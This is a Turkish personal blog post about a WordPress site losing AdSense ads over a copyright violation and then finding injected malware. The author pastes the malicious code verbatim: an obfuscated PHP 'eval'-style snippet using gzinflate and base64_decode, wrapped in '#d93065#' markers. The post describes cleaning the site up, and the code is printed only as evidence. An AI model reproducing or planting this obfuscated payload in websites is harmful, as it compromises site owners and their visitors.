Kişisel

Sitemde Virüs Uyarısı Hakkında

Uzatmadan hemen açıklamasını yapayım. Bildiğiniz gibi 4 gün öncesi bir film paylaşmıştım. Filmin adı ‘Zamana Karşı’. Google’dan gelen e postamda önce sponsorluğumun kaldırılması oldu. Sponsorluğun gösterilmemesi nedeni ile hemen maillerimi kontrol etmeye başladım. Google amcamızdan gelen mail şöyleydi;

 

Sayın Kullanıcımız,

Yakın zamanda hesabınızda yaptığımız bir incelemede, şu anda Google reklamlarını program politikalarımıza uygun olmayan bir şekilde gösterdiğinizi tespit ettik.

————————————————–

ÖRNEK SAYFA: http://www.oemrey.com/zamana-karsi-in-time-2011

Bu URL’nin bir örnek olduğunu ve aynı ihlallerin bu web sitesinin başka sayfalarında veya ağınızdaki başka sitelerde bulunabileceğini unutmayın.

BULUNAN İHLALLER:

TELİF HAKKI KAPSAMINDAKİ MATERYAL: Program politikalarımızda belirtildiği gibi, AdSense yayıncılarının, telif hakkı kapsamına giren materyallerin dağıtımının yapıldığı sitelere Google reklamları yerleştirmesine izin verilmez. Buna telif hakkı kapsamına giren materyallerin sitenizde barındırılması ve telif hakkı kapsamına giren materyaller içeren sitelere bağlantı sağlanması veya trafik yönlendirilmesi de dahildir. Bu politikayla ilgili daha fazla bilgi edinmek için yardım merkezimizi ziyaret edebilirsiniz

YAPILAN İŞLEM: Sitenize reklam sunumunu devre dışı bıraktık.

HESAP DURUMU: ETKİN

AdSense hesabınız hala etkindir. Ancak, ekibimizin hesabınızı herhangi bir zamanda devre dışı bırakma hakkını saklı tuttuğunu lütfen unutmayın. Bu nedenle, program politikalarımız hakkında bilgi edinmenizi ve ağınızı bu politikalar ışığında izlemenizi öneririz.

Sorun Kimlik Numarası 12210746

————————————————–

İşbirliğiniz için teşekkür ederiz.

Saygılarımızla,

Google AdSense Ekibi

 

Bildiğiniz gibi filmler ‘frame’ kodları içe sayfa içeriğinde açılıyor. Benim tahminim filmi aldığım site extra kodlar eklemeye başlamış tüm dosyalarıma. Tema klasörüme kadar giren kodlar şu şekildi;

 

#d93065# echo(gzinflate(base64_decode("tVVNc5swEP0rrS/geuwiAZIYol7yE3r0+OBibJOJF49M68l48t+7u4L4I+Cmh4wxSNq3q6fdt/BwKFy1b34UVuaVLaZ4X4fHClb1cbaqi9+7Eppx415OUB6/FLO9q5u6edmXr8WyKbbhdvOrdJvSjU9rOw+mMgP6Kw0qgakCCUqCjkEJ0BloASoGjSsGDKiUZwZiNEY8vrBrDRJRMSQK0ozASUQDj5GAj4gjSwIJiCHFB0JSHJoUaaTQ0TlT0uocQxM9DCWusEYTbzJHxAEHOO2LN3guIyg07oczpjpNQMoeAhgYdyCsAElnUIpPjhd6RJDhD12U34YJa06S4eiSzN6QtZsLsqEzBUowIFEXvDObcZn3QRhmis2Kz0qItN3+FqH5ICZua8RmEzEDzY5+HLUnRiBSV6rdlS5ODaYZKRFZ3eVG81QSnirM+dY+8VmXvE4alDpDSKRFi4aRyXkFU8hp7qs0WrAGvaW+mJITJ1KJK3pTNSyeHmEYL1PFfr4JuNR3GsELJmY/PnZvR7Dm3xER/ly4alq9ElR3QlJtic4ZRY831aHfZ8juitGleMy/lNN2wY12xHC8QU1RpCFV3Yt3qTbuhOgu/E2HfdgPFeOmQX1Juv77/9q+b+ieiB9/mX3aS9owLmHZcDjEEBPVaULSx6O3a4PFPFrMDvvnqgkDCMb5bmWDZZCX1n+35qNyNBn9WT6PFvnRrvODnS9yZ382roJNvq5dmKcq/WqrvJpYMT494egwsW62dvXucbt0j/WqDGMzEd+O86fFOH8twwPeH76338q/"))); #/d93065#

 

Ana sayfada üst kısımda şu şekil gösteriyordu.

3pmts

 

Baktım iş çığrığından çıktı. Tüm dosyaları bilgisayarıma indirdim. Wmaracı forum sayfasına açmış olduğum Şu konuda arkadaşlardan bir kaçı kullandıkları antivirüs yazılımlarının uyarı verdiklerini öne sürdüler. Eset, avira, Kaspersky gibi arkadaşların yazdığı antivirüs yazılımlarını indirip tarattım. Hiç bir virüs uyarısı vermediğini öne sürdüm. İndirdiğim dosyalardaki yukarıda verdiğim virüs kodunu temizlemek 2 günümü aldı. Baktım ki olmuyor, wordpress sitesinden tekrar indirdim. Tekrar kurulum yapıp devam ettim.

İlginizi çekebilir;  WordPress Multi Blog

 

Natro hosting destek bölümünden destek talebi istediğimde ftp bilgilerimin değiştirmem gerektiğini öne sürdüler. Girip herşeyi tek tek değiştirdim. Ben size zarar vermek ister miyim? ???? Ayıp ediyorsunuz. ????

 

Google amcaya tekrar bilgileri gönderdim. Araştırmalarıma göre günler yada haftaları alıyormuş bu uyarının kaldırılması. Nedense benim 1 günümü bile almadı ???? Torpil mi demeliyim? ????

 

Şimdi ne yapacağım?

Film eklemeyi kaldırıyorum arkadaşlar. Artık film eklemeyeceğim. Film yerine klip müzik türü şeyler eklemeyi düşünüyorum. Yada tamamen kaldırmalımıyım?

 

eyildirmaz com virus temizlendi

 

Yukarıdaki resimde de size kanıt olsun diye ekledim. Virüsleri tamamen sildiğime dair bir kanıt diyeyim ????

 

Söz veriyorum bir daha olmayacak! ????

Emre Allison

Tam bir teknoloji aşığı, yazılım, donanım meraklısı ve sıkı bir web geliştiricisiyim. Tecrübe ve birikimlerini güncel teknolojik gelişmeler ışığında daha geniş kitlelere ulaştırabilmek adına emreallison.com‘da devam ettiriyorum.

Bir Yorum

  1. Şu an aynı sorunu ben de yaşıyorum inşallah aşacağım. Bilgisayara bile format attım. Ben üstelik film falan değil. Eğitim dokümanı paylaşmıştım.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Başa dön tuşu
error: